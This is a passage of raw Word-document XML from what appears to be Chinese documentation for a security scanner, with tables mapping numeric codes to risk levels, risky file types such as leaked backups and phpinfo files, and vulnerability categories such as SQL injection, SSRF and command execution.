          <w:p w14:paraId="69E199FD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4BF2FC75" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FE429EA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>regexLevel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F28EFEA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7088D226" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>低危</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="416A36C0" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43CBE9B3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>regexLevel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00D13FAA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="768402BE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>中危</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6A54409E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22C32F34" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>regexLevel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34F6B45C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7771F86C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3D3FD121" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="290" w:name="风险文件类型"/>
      <w:bookmarkEnd w:id="289"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>风险文件类型</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1207"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1407"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="739E8F3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446AFC3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36D19E56" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22B4228F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="56EADAE2" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24E8B421" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>regexType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E5321BF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26424201" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>临时文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0EB5D6EA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0ADBE4A0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>regexType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30DE7D68" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="627DC9DC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>压缩文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5B55A781" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71028840" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>regexType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0931F6C4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CD465E3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>备份文件泄露</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5B867933" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0007EB3D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>regexType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4AD841CD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6561299E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>数据文件泄露</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4770C256" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50E47B75" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>regexType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="686120DA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="713633DE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>配置文件泄露</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="63E499CF" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4BDC2C4B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>regexType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="589C04EC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7475BD1B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>日志泄露</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="36AEE834" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53ED94B5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>regexType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C6EBCEB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F52630F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>脚本泄露</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="78F20A70" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F0EDDBE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>regexType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="285DAD79" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CD4C0B7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Office文档</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3C8E04C6" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78876258" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>regexType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CD4CD51" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0AD5864E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>源代码泄露</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5A29274E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F5A00BD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>regexType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2ADB2036" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="336F9162" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>系统文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="349A2749" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77D5B8D8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>regexType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D212AAE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C6F4AEC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>phpinfo文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="18E1F669" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="291" w:name="漏洞类型"/>
      <w:bookmarkEnd w:id="290"/>
      <w:r>
        <w:t>漏洞类型</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1053"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1839"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="30D169F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FB6DA49" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14E0E895" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1347493D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="013F2454" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CDB53DD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="352D4065" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="240C26F4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>SQL注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="744345F0" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E615B24" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27F26FDD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1ABA3300" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>未授权访问</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="786543A5" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53DEF834" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2BE4D203" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04597EE1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>敏感信息泄露</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6AAD925F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FE0FCD6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55508D29" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E443B8F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>XML外部实体注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3598F248" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FD533E9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51352C9D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FFD5AFF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>跨站脚本攻击</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5CAF37EC" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4793818F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00DE16C8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="631CA33D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>不安全的反序列</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="64CE521C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49013918" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4EF817D2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1EB6C5C8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>客户端请求伪造</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0C7874C7" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A30EED0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="224677F5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0474B60B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>服务端请求伪造</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5BC13E33" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0424B34A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0EFECBD1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FDDD1AA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>命令执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
